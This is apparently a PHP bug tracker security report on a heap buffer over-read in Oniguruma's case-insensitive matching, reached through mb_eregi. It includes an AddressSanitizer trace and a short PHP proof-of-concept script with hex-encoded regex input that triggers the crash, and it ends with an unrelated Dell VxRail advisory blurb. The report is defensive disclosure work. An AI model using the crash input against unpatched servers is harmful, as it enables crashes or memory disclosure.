Headline
CVE-2019-19246: Heap buffer overflow in mb_eregi
Oniguruma through 6.9.3, as used in PHP 7.3.x and other products, has a heap-based buffer over-read in str_lower_case_match in regexec.c.
Sec Bug #78559
Heap buffer overflow in mb_eregi
Submitted:
2019-09-18 10:48 UTC
Modified:
2019-09-24 04:50 UTC
From:
Assigned:
stas (profile)
Status:
Closed
Package:
mbstring related
PHP Version:
7.3.9
OS:
Private report:
No
CVE-ID:
None
[2019-09-18 10:48 UTC] [email protected]
Description:
Against libonig 2.9.3 the test script gives:
================================================================= ==17768==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000023727 at pc 0x00000184bd62 bp 0x7ffda9f2f1d0 sp 0x7ffda9f2f1c8 READ of size 1 at 0x603000023727 thread T0 #0 0x184bd61 in str_lower_case_match /home/nikic/libonig/src/regexec.c:4017:11 #1 0x184bd61 in slow_search_ic /home/nikic/libonig/src/regexec.c:4040:9 #2 0x184bd61 in forward_search_range /home/nikic/libonig/src/regexec.c:4355:9 #3 0x18487df in onig_search_with_param /home/nikic/libonig/src/regexec.c:4778:17 #4 0x1847554 in onig_search /home/nikic/libonig/src/regexec.c:4574:7 #5 0xa99ad0 in _php_mb_onig_search /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:878:8 #6 0xa99ad0 in _php_mb_regex_ereg_exec /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:936:6 #7 0x168f607 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:1326:2 #8 0x148597c in execute_ex /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:54074:7 #9 0x148605c in zend_execute /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:58355:2 #10 0x130625f in zend_execute_scripts /home/nikic/php-src-fuzz/Zend/zend.c:1643:4 #11 0x10f0935 in php_execute_script /home/nikic/php-src-fuzz/main/main.c:2587:14 #12 0x17979c0 in do_cli /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:961:5 #13 0x1794a0f in main /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:1352:18 #14 0x7ff709f62b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/…/csu/libc-start.c:310 #15 0x447139 in _start (/home/nikic/php-src-fuzz/sapi/cli/php+0x447139)
0x603000023727 is located 0 bytes to the right of 23-byte region [0x603000023710,0x603000023727) allocated by thread T0 here: #0 0x4bf03d in malloc (/home/nikic/php-src-fuzz/sapi/cli/php+0x4bf03d) #1 0x17f44c0 in set_optimize_exact /home/nikic/libonig/src/regcomp.c:5687:25 #2 0x17f44c0 in set_optimize_info_from_tree /home/nikic/libonig/src/regcomp.c:5800:11 #3 0x17f44c0 in onig_compile /home/nikic/libonig/src/regcomp.c:6194:7 #4 0x1817d6e in onig_new /home/nikic/libonig/src/regcomp.c:6356:7 #5 0xaa018d in php_mbregex_compile_pattern /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:467:19 #6 0xa99a48 in _php_mb_regex_ereg_exec /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:927:7 #7 0x168f607 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:1326:2 #8 0x148597c in execute_ex /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:54074:7 #9 0x148605c in zend_execute /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:58355:2 #10 0x130625f in zend_execute_scripts /home/nikic/php-src-fuzz/Zend/zend.c:1643:4 #11 0x10f0935 in php_execute_script /home/nikic/php-src-fuzz/main/main.c:2587:14 #12 0x17979c0 in do_cli /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:961:5 #13 0x1794a0f in main /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:1352:18 #14 0x7ff709f62b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/…/csu/libc-start.c:310
Test script:
<?php $str = "5b5b5b5b5b5b5b492a5bce946b5c4b5d5c6b5c4b5d5c4b5d1cceb04b5d1cceb07a73717e4b1c52525252525252525252525252525252525252525252525252492a5bce946b5c4b5d5c6b5c4b5d5c4b5d1cceb04b5d1cceb07a73717e4b1c1cceb04b5d1cceb07a73717e4b1c302c36303030ceb07b7bd2a15c305c30663f436f6e74655c5238416711087b363030302c36303030ceb07b7b7b7b7b7b7b363030302c36303030ceb07b7b7b7b7b7b7b4a01"; $str = hex2bin($str); var_dump(mb_eregi($str, $str));
Patches
Add a Patch
Pull Requests
Add a Pull Request
History
AllCommentsChangesGit/SVN commitsRelated reports
[2019-09-18 12:11 UTC] [email protected]
It looks like this is already fixed with current oniguruma master.
[2019-09-20 17:05 UTC] [email protected]
-Status: Open +Status: Analyzed -Assigned To: +Assigned To: stas
[2019-09-24 04:51 UTC] [email protected]
-Status: Analyzed +Status: Closed
Related news
Dell VxRail, versions prior to 7.0.410, contain a Container Escape Vulnerability. A local high-privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the container's underlying OS. Exploitation may lead to a system take over by an attacker.